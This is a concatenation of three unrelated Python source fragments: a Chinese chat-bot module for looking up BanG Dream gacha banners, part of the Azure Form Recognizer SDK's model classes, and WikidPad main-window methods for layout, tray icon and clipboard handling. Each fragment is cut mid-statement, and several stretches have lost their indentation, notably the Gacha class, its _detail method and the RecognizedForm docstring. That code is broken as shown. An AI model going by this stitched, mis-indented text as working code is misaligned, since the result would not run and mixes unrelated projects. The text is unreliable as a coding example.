                    # Event not yet started on this server.
                    detail.extend([MessageSegment.text('活动尚未开始,查查别的服务器吧'), MessageSegment.image(ImageAsset.static_image('kkr/amazed.gif'))])
                return detail
class Gacha:
def __init__(self, card_table):
    """Gacha lookup helper backed by the local bestdori database.

    :param card_table: shared card table used to render card thumbnails
        for pick-up listings.
    """
    self.gacha_table = GachaTable(os.path.join(globals.datapath, 'bestdori.db'))
    self.card_table = card_table
    # User-facing (Chinese) query tokens -> canonical filter values.
    self._mapping = {
        'type': {
            '常驻': 'permanent', '无期限': 'permanent',
            '限时': 'limited', '限定': 'limited', '期间限定': 'limited',
            '特殊': 'special',
        },
        'fixed4star': {
            '必4': 1, '必四': 1,
        }
    }
    # Canonical gacha type -> display label.
    self._type = {
        'permanent': '无期限',
        'limited': '期间限定',
        'special': '特殊',
    }
    # Event type -> display label.
    self._event_type = {
        'story': '一般活动',
        'versus': '竞演LIVE',
        'challenge': '挑战LIVE',
        'live_try': 'LIVE试炼',
        'mission_live': '任务LIVE',
    }
    # Server display name -> server index used by bestdori data.
    self._server = {
        '日服': 0,
        '国际服': 1,
        '台服': 2,
        '国服': 3,
        '韩服': 4,
    }
    # Server index -> asset directory short name.
    self._server_name = {
        0: 'jp',
        1: 'en',
        2: 'tw',
        3: 'cn',
        4: 'kr',
    }
    # Precomputed gacha-id -> event mapping from the bundled JSON file.
    with open(os.path.join(globals.datapath, 'json', 'event_gacha.json'), 'r', encoding='utf-8') as f:
        self._gacha_event = json.load(f)['gacha2event']
def _parse_query_command(self, string):
    """Parse a gacha-list query command into an ordered constraint dict.

    :param string: raw command text, e.g. ``"卡池列表 常驻 必4"``.
    :return: OrderedDict mapping attribute name ('type', 'fixed4star') to a
        list of accepted values, or None when the input is not a well-formed
        gacha-list command (wrong keyword, unknown token, or empty input).
    """
    tokens = string.split()
    # Guard: empty input previously raised IndexError on tokens[0];
    # treat it as "not a gacha-list command" instead.
    if not tokens or tokens[0] != '卡池列表':
        return None
    constraint = collections.OrderedDict()
    for token in tokens[1:]:
        for attribute, value_map in self._mapping.items():
            key = token.lower()
            if key not in value_map:
                continue
            bucket = constraint.setdefault(attribute, [])
            mapped = value_map[key]
            # A mapping entry may expand to several canonical values.
            if isinstance(mapped, list):
                bucket.extend(mapped)
            else:
                bucket.append(mapped)
            break
        else:
            # Token matched no known attribute: the whole command is invalid.
            return None
    return constraint
def _detail(self, eid, server):
res = self.gacha_table.select_by_single_value('bannerAssetBundleName', 'resourceName', id=eid)
if res:
detail = Message()
banner_asset_bundle_name, resourceName = res[0]
with open(os.path.join(globals.datapath, 'json', 'gachas', f'{eid}.json'), 'r', encoding='utf-8') as f:
gacha_data = json.load(f)
if gacha_data["publishedAt"][server]:
file_path = os.path.join(globals.asset_gacha_path, self._server_name[server], f'{banner_asset_bundle_name}.png')
if os.access(file_path, os.R_OK):
detail.append(MessageSegment.image(ImageAsset.image_path(file_path)))
else:
file_path = os.path.join(globals.asset_gacha_path, resourceName, self._server_name[server], 'logo.png')
if os.access(file_path, os.R_OK):
detail.append(MessageSegment.image(ImageAsset.image_path(file_path)))
detail.append(MessageSegment.text('\n'.join([f'{key}: {value}' for key, value in {
'标题': gacha_data['gachaName'][server],
'种类': self._type[gacha_data['type']],
'开始时间': f'{(datetime.datetime.utcfromtimestamp(int(gacha_data["publishedAt"][server]) // 1000) + datetime.timedelta(hours=8)).strftime("%Y-%m-%d %H:%M:%S")}(北京时间)',
'结束时间': f'{(datetime.datetime.utcfromtimestamp(int(gacha_data["closedAt"][server]) // 1000) + datetime.timedelta(hours=8)).strftime("%Y-%m-%d %H:%M:%S")}(北京时间)',
}.items()])))
new_cards = [card for card in gacha_data['newCards'] if gacha_data['details'][server][str(card)]['pickup']]
if new_cards:
detail.append(MessageSegment.text('\nPICK UP: '))
cards = self.card_table.select('id', 'resourceSetName', 'rarity', 'attribute', 'bandId', id=gacha_data['newCards'])
rewards = ImageProcesser.thumbnail(
images=[ImageProcesser.merge_image(c[1], c[2], c[3], c[4], thumbnail=True, trained=False) for c in cards],
labels=[str(c[0]) for c in cards],
| |
# sdk/formrecognizer/azure-ai-formrecognizer/azure/ai/formrecognizer/_models.py
# coding=utf-8
# ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
# pylint: disable=protected-access, too-many-lines
from typing import Any, Iterable, List
from enum import Enum
from collections import namedtuple
from ._generated.v2022_01_30_preview.models import ModelInfo, Error
from ._helpers import (
adjust_value_type,
adjust_confidence,
get_element,
adjust_text_angle,
_get_deserialize,
)
def prepare_document_spans(spans):
    """Convert generated span models to DocumentSpan; empty list when absent."""
    if not spans:
        return []
    return [DocumentSpan._from_generated(span) for span in spans]
def prepare_bounding_regions(regions):
    """Convert generated region models to BoundingRegion; empty list when absent."""
    if not regions:
        return []
    return [BoundingRegion._from_generated(region) for region in regions]
def get_bounding_box(field):
    """Return the four corner Points of *field*'s bounding box, or None.

    The generated model stores the box as a flat sequence of 8 floats in
    clockwise corner order starting at the top-left.
    """
    box = field.bounding_box
    if not box:
        return None
    return [Point(x=box[i], y=box[i + 1]) for i in range(0, 8, 2)]
def resolve_element(element, read_result):
    """Resolve a generated element reference into the matching Form* model.

    Dispatches on the element kind reported by get_element; raises
    ValueError when the reference cannot be parsed.
    """
    kind, resolved, page = get_element(element, read_result)
    factories = {
        "word": FormWord._from_generated,
        "line": FormLine._from_generated,
        "selectionMark": FormSelectionMark._from_generated,
    }
    factory = factories.get(kind)
    if factory is None:
        raise ValueError("Failed to parse element reference.")
    return factory(resolved, page=page)
def get_field_value(
    field, value, read_result
):  # pylint: disable=too-many-return-statements
    """Unpack a generated field value into a plain Python value.

    Scalar types map directly onto their ``value_*`` attribute; arrays and
    objects recurse through FormField. Unknown types yield None.
    """
    if value is None:
        return value
    scalar_attrs = {
        "string": "value_string",
        "number": "value_number",
        "integer": "value_integer",
        "date": "value_date",
        "phoneNumber": "value_phone_number",
        "time": "value_time",
        "selectionMark": "value_selection_mark",
        "countryRegion": "value_country_region",
    }
    attr = scalar_attrs.get(value.type)
    if attr is not None:
        return getattr(value, attr)
    if value.type == "array":
        if not value.value_array:
            return []
        return [
            FormField._from_generated(field, item, read_result)
            for item in value.value_array
        ]
    if value.type == "object":
        if not value.value_object:
            return {}
        return {
            key: FormField._from_generated(key, item, read_result)
            for key, item in value.value_object.items()
        }
    return None
def get_field_value_v3(value):  # pylint: disable=too-many-return-statements
    """Unpack a v3 generated field value into a plain Python value.

    Scalar types map directly onto their ``value_*`` attribute; arrays and
    objects recurse through DocumentField, currency maps to CurrencyValue.
    Unknown types yield None.
    """
    if value is None:
        return value
    scalar_attrs = {
        "string": "value_string",
        "number": "value_number",
        "integer": "value_integer",
        "date": "value_date",
        "phoneNumber": "value_phone_number",
        "time": "value_time",
        "signature": "value_signature",
        "selectionMark": "value_selection_mark",
        "countryRegion": "value_country_region",
    }
    attr = scalar_attrs.get(value.type)
    if attr is not None:
        return getattr(value, attr)
    if value.type == "array":
        if not value.value_array:
            return []
        return [DocumentField._from_generated(item) for item in value.value_array]
    if value.type == "currency":
        return CurrencyValue._from_generated(value.value_currency)
    if value.type == "object":
        if not value.value_object:
            return {}
        return {
            key: DocumentField._from_generated(item)
            for key, item in value.value_object.items()
        }
    return None
class DocumentBuildMode(str, Enum):
    """The mode used when building custom models.
    For more information, see https://aka.ms/azsdk/formrecognizer/buildmode.
    """

    # Values are the literal mode strings the service accepts.
    NEURAL = "neural"
    TEMPLATE = "template"
class FieldValueType(str, Enum):
    """Semantic data type of the field value.
    .. versionadded:: v2.1
        The *selectionMark* and *countryRegion* values
    """

    # Service wire-format type identifiers.
    STRING = "string"
    DATE = "date"
    TIME = "time"
    PHONE_NUMBER = "phoneNumber"
    FLOAT = "float"
    INTEGER = "integer"
    LIST = "list"
    DICTIONARY = "dictionary"
    SELECTION_MARK = "selectionMark"
    COUNTRY_REGION = "countryRegion"
class LengthUnit(str, Enum):
    """The unit used by the width, height and bounding box properties.
    For images, the unit is "pixel". For PDF, the unit is "inch".
    """

    # Unit identifiers as returned by the service.
    PIXEL = "pixel"
    INCH = "inch"
class TrainingStatus(str, Enum):
    """Status of the training operation."""

    # Terminal states reported by the service for a training request.
    SUCCEEDED = "succeeded"
    PARTIALLY_SUCCEEDED = "partiallySucceeded"
    FAILED = "failed"
class CustomFormModelStatus(str, Enum):
    """Status indicating the model's readiness for use."""

    # Lifecycle states of a custom model.
    CREATING = "creating"
    READY = "ready"
    INVALID = "invalid"
class FormContentType(str, Enum):
    """Content type for upload.
    .. versionadded:: v2.1
        Support for image/bmp
    """

    # MIME types accepted for document uploads.
    APPLICATION_PDF = "application/pdf"
    IMAGE_JPEG = "image/jpeg"
    IMAGE_PNG = "image/png"
    IMAGE_TIFF = "image/tiff"
    IMAGE_BMP = "image/bmp"
class Point(namedtuple("Point", "x y")):
    """The x, y coordinate of a point on a bounding box.
    :ivar float x: x-coordinate
    :ivar float y: y-coordinate
    .. versionadded:: v2.1
        Support for *to_dict* and *from_dict* methods
    """

    __slots__ = ()

    def __new__(cls, x, y):
        return super(Point, cls).__new__(cls, x, y)

    def to_dict(self):
        # type: () -> dict
        """Returns a dict representation of Point.
        :return: dict
        :rtype: dict
        """
        # Pair up the namedtuple field names with their values.
        return dict(zip(self._fields, self))

    @classmethod
    def from_dict(cls, data):
        # type: (dict) -> Point
        """Converts a dict in the shape of a Point to the model itself.
        :param dict data: A dictionary in the shape of Point.
        :return: Point
        :rtype: Point
        """
        return cls(*(data.get(name) for name in cls._fields))
class FormPageRange(namedtuple("FormPageRange", "first_page_number last_page_number")):
    """The 1-based page range of the form.
    :ivar int first_page_number: The first page number of the form.
    :ivar int last_page_number: The last page number of the form.
    .. versionadded:: v2.1
        Support for *to_dict* and *from_dict* methods
    """

    __slots__ = ()

    def __new__(cls, first_page_number, last_page_number):
        return super(FormPageRange, cls).__new__(
            cls, first_page_number, last_page_number
        )

    def to_dict(self):
        # type: () -> dict
        """Returns a dict representation of FormPageRange.
        :return: dict
        :rtype: dict
        """
        # Pair up the namedtuple field names with their values.
        return dict(zip(self._fields, self))

    @classmethod
    def from_dict(cls, data):
        # type: (dict) -> FormPageRange
        """Converts a dict in the shape of a FormPageRange to the model itself.
        :param dict data: A dictionary in the shape of FormPageRange.
        :return: FormPageRange
        :rtype: FormPageRange
        """
        return cls(*(data.get(name) for name in cls._fields))
class FormElement(object):
    """Base type which includes properties for a form element.

    :ivar str text: The text content of the element.
    :ivar list[~azure.ai.formrecognizer.Point] bounding_box:
        A list of 4 points representing the quadrilateral bounding box
        that outlines the text. The points are listed in clockwise
        order: top-left, top-right, bottom-right, bottom-left.
        Units are in pixels for images and inches for PDF.
    :ivar int page_number:
        The 1-based number of the page in which this content is present.
    :ivar str kind:
        The kind of form element. Possible kinds are "word", "line", or
        "selectionMark" which correspond to a
        :class:`~azure.ai.formrecognizer.FormWord`,
        :class:`~azure.ai.formrecognizer.FormLine`,
        or :class:`~azure.ai.formrecognizer.FormSelectionMark`, respectively.
    .. versionadded:: v2.1
        Support for *to_dict* and *from_dict* methods
    """

    def __init__(self, **kwargs):
        for name in ("bounding_box", "page_number", "text", "kind"):
            setattr(self, name, kwargs.get(name))

    def to_dict(self):
        # type: () -> dict
        """Returns a dict representation of FormElement.
        :return: dict
        :rtype: dict
        """
        box = (
            [point.to_dict() for point in self.bounding_box]
            if self.bounding_box
            else []
        )
        return {
            "text": self.text,
            "bounding_box": box,
            "page_number": self.page_number,
            "kind": self.kind,
        }

    @classmethod
    def from_dict(cls, data):
        # type: (dict) -> FormElement
        """Converts a dict in the shape of a FormElement to the model itself.
        :param dict data: A dictionary in the shape of FormElement.
        :return: FormElement
        :rtype: FormElement
        """
        raw_box = data.get("bounding_box", [])
        box = (
            [Point.from_dict(point) for point in raw_box]  # type: ignore
            if len(raw_box) > 0
            else []
        )
        return cls(
            text=data.get("text"),
            page_number=data.get("page_number"),
            kind=data.get("kind"),
            bounding_box=box,
        )
class RecognizedForm(object):
"""Represents a form that has been recognized by a trained or prebuilt model.
The `fields` property contains the form fields that were extracted from the
form. Tables, text lines/words, and selection marks are extracted per page
and found in the `pages` property.
:ivar str form_type:
The type of form the model identified the submitted form to be.
:ivar str form_type_confidence:
Confidence of the type of form the model identified the submitted form to be.
:ivar str model_id:
Model identifier of model used to analyze form if not using a prebuilt
model.
:ivar fields:
A dictionary of the fields found on the form. The fields dictionary
keys are the `name` of the field. For models trained with labels,
this is the training-time label of the field. For models trained
without labels, a unique name is generated for each field.
:vartype fields: dict[str, ~azure.ai.formrecognizer.FormField]
:ivar ~azure.ai.formrecognizer.FormPageRange page_range:
The first and last page number of the input form.
:ivar list[~azure.ai.formrecognizer.FormPage] pages:
A list of pages recognized from the input document. Contains lines,
words, selection marks, tables and page metadata.
.. versionadded:: v2.1
The *form_type_confidence* and *model_id* properties, support for
*to_dict* and *from_dict* methods
"""
def __init__(self, **kwargs):
    """Collect recognized-form attributes from keyword arguments."""
    for name in (
        "fields",
        "form_type",
        "page_range",
        "pages",
        "model_id",
        "form_type_confidence",
    ):
        setattr(self, name, kwargs.get(name))
def __repr__(self):
    """Debug representation, capped at 1024 characters."""
    text = (
        "RecognizedForm(form_type={}, fields={}, page_range={}, pages={}, "
        "form_type_confidence={}, model_id={})".format(
            self.form_type,
            repr(self.fields),
            repr(self.page_range),
            repr(self.pages),
            self.form_type_confidence,
            self.model_id,
        )
    )
    return text[:1024]
def to_dict(self):
    # type: () -> dict
    """Returns a dict representation of RecognizedForm.
    :return: dict
    :rtype: dict
    """
    fields = (
        {name: field.to_dict() for name, field in self.fields.items()}
        if self.fields
        else {}
    )
    pages = [page.to_dict() for page in self.pages] if self.pages else []
    page_range = self.page_range.to_dict() if self.page_range else None
    return {
        "fields": fields,
        "form_type": self.form_type,
        "pages": pages,
        "model_id": self.model_id,
        "form_type_confidence": self.form_type_confidence,
        "page_range": page_range,
    }
@classmethod
def from_dict(cls, data):
# type: (dict) -> RecognizedForm
"""Converts a dict in the shape of a RecognizedForm to the model itself.
:param dict data: A dictionary in the shape of RecognizedForm.
:return: RecognizedForm
:rtype: RecognizedForm
"""
return cls(
fields={k: | |
False
if self.configuration.getint(
"main", "new_window_on_follow_wiki_url") != 1:
# Same window
self.openWiki(filePath, wikiWordsToOpen=(wikiWordToOpen,),
anchorToOpen=anchorToOpen) # ?
return True
else:
# New window
try:
clAction = CmdLineAction([])
clAction.inheritFrom(self.getCmdLineAction())
clAction.setWikiToOpen(link)
clAction.frameToOpen = 1 # Open in new frame
wx.GetApp().startPersonalWikiFrame(clAction)
return True
except Exception, e:
traceback.print_exc()
self.displayErrorMessage(_(u'Error while starting new '
u'WikidPad instance'), e)
return False
return False
def refreshPageStatus(self, docPage = None):
    """
    Read information from page and present it in the field 1 of the
    status bar and in the title bar.

    :param docPage: page to describe; defaults to the currently shown page.
    """
    # Time format comes from user configuration; take the string part of
    # the pair mbcsEnc returns.
    fmt = mbcsEnc(self.getConfig().get("main", "pagestatus_timeformat"),
            "replace")[0]
    if docPage is None:
        docPage = self.getCurrentDocPage()
    # Only real wiki pages (or aliases) carry timestamps; otherwise just
    # clear the status field.
    if docPage is None or not isinstance(docPage,
            (DocPages.WikiPage, DocPages.AliasWikiPage)):
        self.statusBar.SetStatusText(uniToGui(u""), 1)
        return
    pageStatus = u""   # wikiWord
    modTime, creaTime = docPage.getTimestamps()[:2]
    if modTime is not None:
        # pageStatus += _(u"Mod.: %s") % \
        #         mbcsDec(strftime(fmt, localtime(modTime)), "replace")[0]
        # pageStatus += _(u"; Crea.: %s") % \
        #         mbcsDec(strftime(fmt, localtime(creaTime)), "replace")[0]
        pageStatus += _(u"Mod.: %s") % strftimeUB(fmt, modTime)
        pageStatus += _(u"; Crea.: %s") % strftimeUB(fmt, creaTime)
    self.statusBar.SetStatusText(uniToGui(pageStatus), 1)
    # Title: "<wiki name>: <current word> - <config path> - WikidPad".
    self.SetTitle(uniToGui(u"%s: %s - %s - WikidPad" %
            (self.getWikiDocument().getWikiName(), docPage.getWikiWord(),
            self.getWikiConfigPath(), )))
def viewWordSelection(self, title, words, motionType, default=None):
    """
    View a single choice to select a word to go to.

    title -- Title of the dialog
    words -- Sequence of the words to choose from
    motionType -- motion type to set in openWikiPage if word was chosen
    default -- word to preselect in the dialog (may be None)
    """
    if not self.requireReadAccess():
        return
    try:
        dlg = AdditionalDialogs.ChooseWikiWordDialog(self, -1, words,
                motionType, title, default)
        dlg.CenterOnParent(wx.BOTH)
        dlg.ShowModal()
        dlg.Destroy()
    except (IOError, OSError, DbAccessError), e:
        # Database/file access failed: mark the wiki as inaccessible,
        # then propagate so the caller can react.
        self.lostAccess(e)
        raise
def viewParents(self, ofWord):
    """
    Show a selection dialog with all parent nodes of *ofWord*.

    If the page declares a canonical parent via a 'parent' attribute,
    that word is preselected (and added to the list when missing).
    """
    if not self.requireReadAccess():
        return
    try:
        parents = self.getWikiData().getParentRelationships(ofWord)
    except (IOError, OSError, DbAccessError), e:
        self.lostAccess(e)
        raise
    # Check for canonical parent to set as default selection
    default = None
    canonical_parent = self.getWikiDocument().getAttributeTriples(ofWord, "parent", None)
    if canonical_parent:
        # Triples are (word, key, value); the value is the parent word.
        default = canonical_parent[0][2]
        # Add the canonical parent to the list if it does not exist
        if default not in parents:
            parents.append(default)
    self.viewWordSelection(_(u"Parent nodes of '%s'") % ofWord, parents,
            "parent", default)
def viewParentLess(self):
    """Show a selection dialog with all wiki words that have no parents."""
    if not self.requireReadAccess():
        return
    try:
        parentLess = self.getWikiData().getParentlessWikiWords()
    except (IOError, OSError, DbAccessError), e:
        # Mark wiki as inaccessible and propagate.
        self.lostAccess(e)
        raise
    self.viewWordSelection(_(u"Parentless nodes"), parentLess,
            "random")
def viewChildren(self, ofWord):
    """Show a selection dialog with all child nodes of *ofWord*."""
    if not self.requireReadAccess():
        return
    try:
        children = self.getWikiData().getChildRelationships(ofWord)
    except (IOError, OSError, DbAccessError), e:
        # Mark wiki as inaccessible and propagate.
        self.lostAccess(e)
        raise
    self.viewWordSelection(_(u"Child nodes of '%s'") % ofWord, children,
            "child")
def viewBookmarks(self):
    """Show a selection dialog with all pages marked bookmarked=true."""
    if not self.requireReadAccess():
        return
    try:
        # Bookmarked pages carry the attribute triple (word, "bookmarked", "true").
        bookmarked = [w for w,k,v in self.getWikiDocument()
                .getAttributeTriples(None, "bookmarked", u"true")]
    except (IOError, OSError, DbAccessError), e:
        self.lostAccess(e)
        raise
    self.viewWordSelection(_(u"Bookmarks"), bookmarked,
            "random")
def removeFromWikiHistory(self, path):
    """
    Remove path from wiki history (if present) and send a change event.

    Both the relative and the absolute form of *path* are tried; listeners
    are informed once for each successful removal.
    """
    for candidate in (self._getRelativeWikiPath(path), path):
        try:
            self.wikiHistory.remove(candidate)
        except ValueError:
            continue  # this form wasn't in the history
        self.informRecentWikisChanged()
def lastAccessedWiki(self, wikiConfigFilename):
    """
    Writes to the global config the location of the last accessed wiki
    and updates file history.

    The bundled help wiki is deliberately never recorded.
    """
    wikiConfigFilename = self._getStorableWikiPath(wikiConfigFilename)
    if wikiConfigFilename == self.wikiPadHelp:
        return
    # create a new config file for the new wiki
    self.configuration.set("main", "last_wiki", wikiConfigFilename)
    if wikiConfigFilename not in self.wikiHistory:
        # Newest entry goes to the front of the recent-wikis list.
        self.wikiHistory = [wikiConfigFilename] + self.wikiHistory
        # only keep most recent items
        maxLen = self.configuration.getint(
                "main", "recentWikisList_length", 5)
        if len(self.wikiHistory) > maxLen:
            self.wikiHistory = self.wikiHistory[:maxLen]
        self.informRecentWikisChanged()
    self.configuration.set("main", "last_active_dir", dirname(wikiConfigFilename))
    self.writeGlobalConfig()
# Only needed for scripts
def setAutoSave(self, onOrOff):
    """Turn autosave on/off and persist the setting to configuration."""
    self.autoSave = onOrOff
    self.configuration.set("main", "auto_save", onOrOff)
def setShowTreeControl(self, onOrOff):
    """Expand or collapse the main tree pane; focus it when shown."""
    layouter = self.windowLayouter
    layouter.expandWindow("maintree", onOrOff)
    if onOrOff:
        layouter.focusWindow("maintree")
def getShowToolbar(self):
    """Return True if the main toolbar currently exists."""
    return self.GetToolBar() is not None
def setShowToolbar(self, onOrOff):
    """
    Show or hide the main toolbar, persisting the choice to configuration.
    """
    show = bool(onOrOff)
    self.getConfig().set("main", "toolbar_show", show)
    if show == self.getShowToolbar():
        return  # already in the desired state
    if show:
        self.buildToolbar()
        return
    # Tear down: drop the embedded quick-search field reference before
    # destroying and detaching the toolbar widget.
    self.fastSearchField = None
    self.GetToolBar().Destroy()
    self.SetToolBar(None)
def setShowDocStructure(self, onOrOff):
    """
    Show or hide the document-structure pane.

    If the pane exists in the current layout it is expanded/collapsed in
    place; otherwise (when switching it on) the layout string is rebuilt
    with the pane included and the whole window layout is recreated.
    """
    if self.windowLayouter.containsWindow("doc structure"):
        self.windowLayouter.expandWindow("doc structure", onOrOff)
        if onOrOff:
            self.windowLayouter.focusWindow("doc structure")
    else:
        if onOrOff:
            # "1" selects a pane position code -- TODO confirm meaning
            # of the position values.
            self.configuration.set("main", "docStructure_position", u"1")
            layoutCfStr = WindowLayout.calculateMainWindowLayoutCfString(
                    self.configuration)
            self.configuration.set("main", "windowLayout", layoutCfStr)
            # Call of changeLayoutByCf() may crash so save
            # data beforehand
            self.saveCurrentWikiState()
            self.changeLayoutByCf(layoutCfStr)
def setShowTimeView(self, onOrOff):
    """
    Show or hide the time-view pane.

    Mirrors setShowDocStructure: expand/collapse an existing pane, or
    rebuild the whole window layout with the pane included.
    """
    if self.windowLayouter.containsWindow("time view"):
        self.windowLayouter.expandWindow("time view", onOrOff)
        if onOrOff:
            self.windowLayouter.focusWindow("time view")
    else:
        if onOrOff:
            # "2" selects a pane position code -- TODO confirm meaning
            # of the position values.
            self.configuration.set("main", "timeView_position", u"2")
            layoutCfStr = WindowLayout.calculateMainWindowLayoutCfString(
                    self.configuration)
            self.configuration.set("main", "windowLayout", layoutCfStr)
            # Call of changeLayoutByCf() may crash so save
            # data beforehand
            self.saveCurrentWikiState()
            self.changeLayoutByCf(layoutCfStr)
def getStayOnTop(self):
    """
    Return True if this window is set to stay on top of all others.
    """
    return (self.GetWindowStyleFlag() & wx.STAY_ON_TOP) != 0
def setStayOnTop(self, onOrOff):
    """Set or clear the wx.STAY_ON_TOP style bit on this frame."""
    flags = self.GetWindowStyleFlag()
    flags = (flags | wx.STAY_ON_TOP) if onOrOff else (flags & ~wx.STAY_ON_TOP)
    self.SetWindowStyleFlag(flags)
def setShowOnTray(self, onOrOff=None):
    """
    Update UI and config according to the settings of onOrOff.
    If onOrOff is omitted, UI is updated according to current
    setting of the global config
    """
    if not onOrOff is None:
        self.configuration.set("main", "showontray", onOrOff)
    else:
        onOrOff = self.configuration.getboolean("main", "showontray")
    # Tooltip and icon depend on whether a wiki is currently open.
    tooltip = None
    if self.getWikiConfigPath():  # If a wiki is open
        tooltip = _(u"Wiki: %s") % self.getWikiConfigPath()  # self.wikiName
        iconName = self.getConfig().get("main", "wiki_icon", u"")
    else:
        tooltip = u"Wikidpad"
        iconName = u""
    bmp = None
    if iconName != u"":
        bmp = wx.GetApp().getIconCache().lookupIcon(iconName)
    if onOrOff:
        # Create the tray icon lazily on first use.
        if self.tbIcon is None:
            self.tbIcon = TaskBarIcon(self)
        if SystemInfo.isLinux():
            # On Linux, the tray icon must be resized here, otherwise
            # it might be too large.
            if bmp is not None:
                img = bmp.ConvertToImage()
            else:
                img = wx.Image(os.path.join(self.wikiAppDir, 'icons',
                        'pwiki.ico'), wx.BITMAP_TYPE_ICO)
            img.Rescale(20, 20)
            bmp = wx.BitmapFromImage(img)
            icon = wx.IconFromBitmap(bmp)
            self.tbIcon.SetIcon(icon, uniToGui(tooltip))
        else:
            if bmp is not None:
                self.tbIcon.SetIcon(wx.IconFromBitmap(bmp),
                        uniToGui(tooltip))
            else:
                # No custom icon: fall back to the application's standard icon.
                self.tbIcon.SetIcon(wx.GetApp().standardIcon,
                        uniToGui(tooltip))
    else:
        # Tray display switched off: remove and dispose of the icon.
        if self.tbIcon is not None:
            if self.tbIcon.IsIconInstalled():
                self.tbIcon.RemoveIcon()
            self.tbIcon.Destroy()
            self.tbIcon = None
    # # TODO Move to better function
    # if bmp is not None:
    #     self.SetIcon(wx.IconFromBitmap(bmp))
    # else:
    #     print "setShowOnTray25", repr(os.path.join(self.wikiAppDir,
    #             'icons', 'pwiki.ico')), repr(wx.Icon(os.path.join(self.wikiAppDir,
    #             'icons', 'pwiki.ico'), wx.BITMAP_TYPE_ICO))
    #     # self.SetIcon(wx.Icon(os.path.join(self.wikiAppDir,
    #     # 'icons', 'pwiki.ico'), wx.BITMAP_TYPE_ICO))
    #     self.SetIcon(wx.GetApp().standardIcon)
def setHideUndefined(self, onOrOff=None):
    """
    Set if undefined WikiWords should be hidden in the tree.

    Passing None reads the current setting from the global config instead
    of writing a new value.
    """
    if onOrOff is None:
        onOrOff = self.configuration.getboolean("main", "hideundefined")
    else:
        self.configuration.set("main", "hideundefined", onOrOff)
# _LAYOUT_WITHOUT_VIEWSTREE = "name:main area panel;"\
# "layout relation:%s&layout relative to:main area panel&name:maintree&"\
# "layout sash position:170&layout sash effective position:170;"\
# "layout relation:below&layout relative to:main area panel&name:log&"\
# "layout sash position:1&layout sash effective position:120"
#
# _LAYOUT_WITH_VIEWSTREE = "name:main area panel;"\
# "layout relation:%s&layout relative to:main area panel&name:maintree&"\
# "layout sash position:170&layout sash effective position:170;"\
# "layout relation:%s&layout relative to:maintree&name:viewstree;"\
# "layout relation:below&layout relative to:main area panel&name:log&"\
# "layout sash position:1&layout sash effective position:120"
def changeLayoutByCf(self, layoutCfStr):
    """
    Create a new window layouter according to the
    layout configuration string layoutCfStr. Try to reuse and reparent
    existing windows.

    BUG: Reparenting seems to disturb event handling for tree events and
    isn't available for all OS'
    """
    # Handle no size events while realizing layout
    self.Unbind(wx.EVT_SIZE)
    self.windowLayouter.realizeNewLayoutByCf(layoutCfStr)
    # self.windowLayouter.realize()
    self.windowLayouter.layout()
    # Re-bind size events (old-style wx event binding call).
    wx.EVT_SIZE(self, self.OnSize)
    # Re-fetch panes that may have been recreated by the new layout.
    self.tree = self.windowLayouter.getWindowByName("maintree")
    self.logWindow = self.windowLayouter.getWindowByName("log")
# def getClipboardCatcher(self):
# return self.clipboardCatcher is not None and \
# self.clipboardCatcher.isActive()
def OnClipboardCatcherOff(self, evt):
    """Menu handler: switch the clipboard catcher off."""
    interceptor = self.clipboardInterceptor
    interceptor.catchOff()
def OnClipboardCatcherAtPage(self, evt):
    """Menu handler: direct clipboard catcher output to the current page."""
    if not self.isReadOnlyPage():
        self.clipboardInterceptor.catchAtPage(self.getCurrentDocPage())
def OnClipboardCatcherAtCursor(self, evt):
    """Menu handler: catch clipboard content at the current cursor position."""
    if not self.isReadOnlyPage():
        self.clipboardInterceptor.catchAtCursor()
def OnUpdateClipboardCatcher(self, evt):
    """
    UI-update handler keeping the clipboard-catcher menu items' check
    marks, enabled state and labels in sync with the interceptor mode.
    """
    cc = self.clipboardInterceptor
    if cc is None:
        return  # Shouldn't be called anyway
    # Catching modifies the page, so disable the options on read-only pages.
    enableCatcher = not self.isReadOnlyPage()
    if evt.GetId() == GUI_ID.CMD_CLIPBOARD_CATCHER_OFF:
        evt.Check(cc.getMode() == cc.MODE_OFF)
    elif evt.GetId() == GUI_ID.CMD_CLIPBOARD_CATCHER_AT_CURSOR:
        evt.Enable(enableCatcher)
        evt.Check(cc.getMode() == cc.MODE_AT_CURSOR)
    elif evt.GetId() == GUI_ID.CMD_CLIPBOARD_CATCHER_AT_PAGE:
        evt.Enable(enableCatcher)
        if cc.getMode() == cc.MODE_AT_PAGE:
            evt.Check(True)
            # Label shows the page the catcher is currently bound to.
            evt.SetText(_(u"Set at Page: %s\t%s") %
                    (self.clipboardInterceptor.getWikiWord(),
                    self.keyBindings.CatchClipboardAtPage))
        else:
            evt.Check(False)
            evt.SetText(_(u'Set at Page') + u'\t' +
                    self.keyBindings.CatchClipboardAtPage)
def writeGlobalConfig(self):
    """Write out the global config file.

    Access errors mark the wiki as lost and are re-raised; any other
    failure is shown to the user as an error message.
    """
    try:
        self.configuration.save()
    except (IOError, OSError, DbAccessError), e:
        self.lostAccess(e)
        raise
    except Exception, e:
        self.displayErrorMessage(_(u"Error saving global configuration"), e)
def writeCurrentConfig(self):
    """Write out the current config file.

    NOTE(review): saves self.configuration exactly like writeGlobalConfig;
    presumably self.configuration covers the current wiki's settings too --
    confirm against the Configuration class.
    """
    try:
        self.configuration.save()
    except (IOError, OSError, DbAccessError), e:
        self.lostAccess(e)
        raise
    except Exception, e:
        self.displayErrorMessage(_(u"Error saving current configuration"), e)
def showWikiWordOpenDialog(self):
    """Show the modal "open wiki word" dialog, then refocus the editor."""
    AdditionalDialogs.OpenWikiWordDialog.runModal(self, self, -1)
    # dlg = OpenWikiWordDialog(self, -1)
    # try:
    #     dlg.CenterOnParent(wx.BOTH)
    #     dlg.ShowModal()
    self.getActiveEditor().SetFocus()
    # finally:
    #     dlg.Destroy()
def showWikiWordRenameDialog(self, wikiWord=None):
    """
    Show the rename dialog for *wikiWord* (default: the current word).

    Refuses words that resolve to no real page, the special ScratchPad
    page, and read-only pages.
    """
    if wikiWord is None:
        wikiWord = self.getCurrentWikiWord()
    if wikiWord is not None:
        # Resolve aliases/link terms to the real page name.
        wikiWord = self.getWikiDocument().getWikiPageNameForLinkTerm(wikiWord)
    if wikiWord is None:
        self.displayErrorMessage(_(u"No real wiki word selected to rename"))
        return
    if wikiWord == u"ScratchPad":
        self.displayErrorMessage(_(u"The scratch pad cannot be renamed."))
        return
    if self.isReadOnlyPage():
        return
